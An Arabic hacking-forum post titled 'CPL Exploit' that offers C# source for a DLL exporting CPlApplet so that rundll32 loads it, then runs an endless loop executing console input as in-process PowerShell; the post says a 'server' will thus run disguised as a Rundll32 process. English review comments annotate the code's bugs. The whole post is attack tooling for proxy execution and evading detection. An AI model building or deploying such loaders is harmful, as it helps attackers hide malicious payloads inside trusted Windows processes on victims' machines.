25.04.2017 CPL Exploit [Run your Server As Rundl32 process]


رح يشتغل سيرفرك كـعملية Rundll32 بس رح تظهر الكونسول


الأكواد

C#:
using System;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
public class Test
{
    /// <summary>
    /// Exported entry point carrying the name a Control Panel applet exports. It loops
    /// forever: allocates a console, reads one line from it, and prints the result of
    /// handing that line to <see cref="RunPSCommand"/>. No validation is applied to the
    /// line before it is executed.
    /// NOTE(review): <c>DllExport</c> is not a BCL attribute; presumably it comes from an
    /// unmanaged-exports build package — confirm which one the project references.
    /// </summary>
    /// <returns>
    /// Declared as <c>bool</c>, but the trailing <c>return true</c> is unreachable
    /// because the loop has no exit.
    /// </returns>
    [DllExport("CPlApplet", CallingConvention = CallingConvention.StdCall)]
    public static bool CPlApplet()
    {
        while (true)
        {
            // Called on every iteration; its return value is ignored. The visible console
            // window is the side effect the post itself mentions.
            AllocConsole();
            // Both handles are computed but never used, and SetStdHandle is never called,
            // so no stdout redirection actually takes place here.
            IntPtr defaultStdout = new IntPtr(7);
            IntPtr currentStdout = GetStdHandle(StdOutputHandle);
            string x = Console.ReadLine();
            Console.WriteLine(RunPSCommand(x));
            // The try body is empty, so the catch below can never run; an exception thrown
            // by the two lines above propagates out of the exported function instead.
            try
            {
    
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
        }
        return true;
    }
    /// <summary>
    /// Executes <paramref name="cmd"/> as PowerShell script text in a fresh runspace
    /// hosted inside the current process, pipes the output through <c>Out-String</c>,
    /// and returns the rendered text. The script is executed exactly as received.
    /// NOTE(review): because the engine runs in-process via System.Management.Automation,
    /// engine-level controls (script-block logging, AMSI) would be expected to apply
    /// here as they do in any other host — confirm for the engine version in use.
    /// </summary>
    /// <param name="cmd">Script text to execute.</param>
    /// <returns>All pipeline output concatenated and trimmed; empty if nothing was emitted.</returns>
    public static string RunPSCommand(string cmd)
    {
        Runspace runspace = RunspaceFactory.CreateRunspace();
        runspace.Open();
        // Constructed but never used anywhere in this method.
        RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
        Pipeline pipeline = runspace.CreatePipeline();
        pipeline.Commands.AddScript(cmd);
        pipeline.Commands.Add("Out-String");
        // Synchronous invocation. There is no try/finally, so if Invoke throws the
        // runspace opened above is never closed.
        Collection<PSObject> results = pipeline.Invoke();
        runspace.Close();
        StringBuilder stringBuilder = new StringBuilder();
        foreach (PSObject obj in results)
        {
            // Append(object) relies on PSObject.ToString() for the rendered text.
            stringBuilder.Append(obj);
        }
        return stringBuilder.ToString().Trim();
    }
    /// <summary>
    /// Runs <paramref name="script"/> through a default <see cref="PowerShell"/> instance
    /// and discards the output. Despite the name, the parameter is script text (it is
    /// passed to <c>AddScript</c>), not a file path. Nothing in this listing calls it.
    /// </summary>
    /// <param name="script">Script text to execute.</param>
    public static void RunPSFile(string script)
    {
        // The PowerShell instance is never disposed.
        PowerShell ps = PowerShell.Create();
        ps.AddScript(script).Invoke();
    }
    // STD_OUTPUT_HANDLE expressed as an unsigned DWORD: 0xFFFFFFF5 == (DWORD)-11.
    private const UInt32 StdOutputHandle = 0xFFFFFFF5;
    // Win32 console-handle imports. GetStdHandle is called once in CPlApplet and its
    // result is discarded; SetStdHandle is declared but never called in this listing.
    [DllImport("kernel32.dll")]
    private static extern IntPtr GetStdHandle(UInt32 nStdHandle);
    [DllImport("kernel32.dll")]
    private static extern void SetStdHandle(UInt32 nStdHandle, IntPtr handle);
    // Allocates a new console for the calling process; the caller ignores the BOOL result.
    [DllImport("kernel32")]
    static extern bool AllocConsole();
الفيديو بالمرفقات.

 
